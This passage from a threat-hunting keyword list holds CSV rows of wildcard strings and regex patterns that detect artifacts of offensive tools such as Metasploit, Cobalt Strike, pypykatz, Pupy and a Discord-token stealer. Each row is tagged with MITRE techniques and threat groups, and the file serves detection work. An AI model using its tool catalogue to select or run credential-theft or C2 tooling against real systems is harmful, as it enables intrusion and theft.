CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*_EvilClippy.*",".{0,1000}_EvilClippy\..{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*_execve_binsh.s*",".{0,1000}_execve_binsh\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_find_sharpgen_dll*",".{0,1000}_find_sharpgen_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*_generate_bind_payloads_password*",".{0,1000}_generate_bind_payloads_password.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*_generate_scramblesuit_passwd*",".{0,1000}_generate_scramblesuit_passwd.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*_GetNetLoggedon.py*",".{0,1000}_GetNetLoggedon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*_iepv.zip.*",".{0,1000}_iepv\.zip\..{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*_KIWI_BCRYPT_HANDLE_KEY*",".{0,1000}_KIWI_BCRYPT_HANDLE_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_KIWI_BCRYPT_KEY*",".{0,1000}_KIWI_BCRYPT_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_KIWI_BCRYPT_KEY81*",".{0,1000}_KIWI_BCRYPT_KEY81.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" 
"*_KIWI_MASTERKEY_CACHE_ENTRY*",".{0,1000}_KIWI_MASTERKEY_CACHE_ENTRY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_lfi_rce.rb*",".{0,1000}_lfi_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_lsass.txt*",".{0,1000}_lsass\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_lsassdecrypt.py*",".{0,1000}_lsassdecrypt\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_mailinthemiddle.log*",".{0,1000}_mailinthemiddle\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*_mouse_rce.rb*",".{0,1000}_mouse_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_msfconsole*",".{0,1000}_msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_msfvenom*",".{0,1000}_msfvenom.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_nimplant_*",".{0,1000}_nimplant_.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*_NT6_CLEAR_SECRET*",".{0,1000}_NT6_CLEAR_SECRET.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*_peloader.dll*",".{0,1000}_peloader\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*_posh-common*",".{0,1000}_posh\-common.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*_prefix_PEzor_*",".{0,1000}_prefix_PEzor_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*_pycobalt_*",".{0,1000}_pycobalt_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*_REFLECTIVEDLLINJECTION_*",".{0,1000}_REFLECTIVEDLLINJECTION_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*_Shellcode.bin*",".{0,1000}_Shellcode\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*_smtp_user-enum_hydra_*",".{0,1000}_smtp_user\-enum_hydra_.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk.txt*",".{0,1000}_snmp_snmpwalk\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_process_paths.txt*",".{0,1000}_snmp_snmpwalk_process_paths\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_running_processes.txt*",".{0,1000}_snmp_snmpwalk_running_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_software_names.txt*",".{0,1000}_snmp_snmpwalk_software_names\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" 
"*_snmp_snmpwalk_storage_units.txt*",".{0,1000}_snmp_snmpwalk_storage_units\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_system_processes.txt*",".{0,1000}_snmp_snmpwalk_system_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_tcp_ports.txt*",".{0,1000}_snmp_snmpwalk_tcp_ports\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_snmp_snmpwalk_user_accounts.txt*",".{0,1000}_snmp_snmpwalk_user_accounts\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*_tcp_cc2(*",".{0,1000}_tcp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*_udp_cc2(*",".{0,1000}_udp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*{os.getlogin()} | Fentanyl*",".{0,1000}\{os\.getlogin\(\)\}\s\|\sFentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*{process_to_inject}.exe*",".{0,1000}\{process_to_inject\}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*| favfreak*",".{0,1000}\|\sfavfreak.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*| hakrawler*",".{0,1000}\|\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web 
